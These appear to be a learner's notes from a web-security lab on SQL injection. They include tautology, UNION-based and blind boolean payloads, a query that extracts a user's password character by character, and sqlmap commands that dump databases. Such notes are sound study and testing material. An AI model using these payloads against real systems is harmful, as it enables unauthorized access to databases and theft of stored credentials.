
SQL Injection takes advantage of weak input sanitization in order to run crafted SQL statements on a webpage and get back un-intended results that are supposed to be hidden.
	A good cheat sheet resource
	portswigger.net/web-security/sqlinjection/cheat-sheet

Entry in a Search Field: `jeremy' or 1=1#` might return more than expected.
	The ' at the end of jeremy  
	The `or 1=1` will always return true or equal everything in an SQL perspective
	The # is a terminator which will end the sequel query.  There are some others depending on the version of SQL running.

SQL Injection UNION - This allows us to grab information from other tables that we should not have access to.  We have to select the same number of columns as the original query.  
	In order to find out how many columns are needed you try this:
	`jeremy' union select null#`
	`jeremy' union select null,null#`
	`jeremy' union select null,null,null#`
		Do this until you get a return with information and that null is your entry point
	From here, once you know where you're going you can do something like the following:
	`jeremy' union select null,null,version()#`
		This should spit out the version of the database
	`jeremy' union select null,null,table_name from information_schema.tables#`
		This spits out the names of all the tables in the database.  You can also switch table for columns:
	`jeremy' union select null,null,column_name from information_schema.columns#`
Another constraint is the data type must match so you may have to try some different things to get integers to integers and strings to strings
	`null(int)` or putting a number in a column, `1`


Blind SQL Injection - it's called "blind" because you don't see the output returned like you would with a union statement.  You have to rely on different feedback in order to pull the information you want.

If you can find an entry point you can extract information by using a series of Boolean questions in order to enumerate the information desired.

Search w3schools.com for SUBSTRING() Function within SQL to help craft your query to enumerate the information you want.

`SELECT SUBSTRING(string, start, length) AS ExtractString;`
	`<injectable entry point>' and substring('a', 1, 1) = 'a'#`
	This will check to see if the first character is an `a` or not.  You'll get a happy return if it is, and a log in error page if not because of the `AND` SQL statement.

We want to change the first part in the substring argument to whatever it is we are wanting to try and enumerate
	`<injectable entry point' and substring((select version()), 1, 1) = 'a'#`
		This will actually check if the first character of the version matches the end number.
			Make sure you put the `select version()` in their own brackets to have it resolve first.  So this will grab the version number of the database and then run the check on it.

From here, you can use Burp's Repeater in order to speed this up.  You'll just use the last part of the check (the `'a'`) and have burp run through the iterations of things that may take a longer time.
	`<injectable entry point' and substring((select password from injection0x02 where username = 'colindy'), 1, 1) = 'a'#`
		This will `select` the `password` `from` the `injection0x02` table `where` the `username` is `'colindy'` and check to see if the first character is `a`.



SQLmap   - read more on this, this is a very useful tool.
`sqlmap -r rep.txt`
	This will start a simple sqlmap scan on a packet grabbed from Burp Suite and sent to repeater.  Copy the whole packet and past it into a text file
		`--level=2`  This is needed for cookies
		`--dump`  This dumps the database
		`-T <tablename>`  This will run the command just on the table listed